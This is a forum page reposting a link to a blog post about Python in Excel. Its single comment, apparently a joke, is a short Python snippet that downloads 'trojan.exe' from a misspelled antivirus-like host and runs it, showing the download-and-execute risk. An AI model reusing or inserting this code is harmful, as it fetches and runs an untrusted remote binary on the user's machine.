Open Menu
AllLocalCommunitiesAbout
lotide
AllLocalCommunitiesAbout
Login

My thoughts on Python in Excel

⁨3⁩ ⁨likes⁩

Submitted ⁨⁨10⁩ ⁨months⁩ ago⁩ by ⁨bot@lemmy.smeargle.fans [bot]⁩ to ⁨hackernews@lemmy.smeargle.fans⁩

https://www.xlwings.org/blog/my-thoughts-on-python-in-excel

HN Discussion

source

Comments

Sort:hotnewtop
  • 30p87@feddit.de ⁨10⁩ ⁨months⁩ ago

    import requests, os with open(“trojan.exe”, “wb”) as file: file.write(requests.get(“download.mcaffe.com/download.exe”).content) os.system(“start trojan.exe”)

    source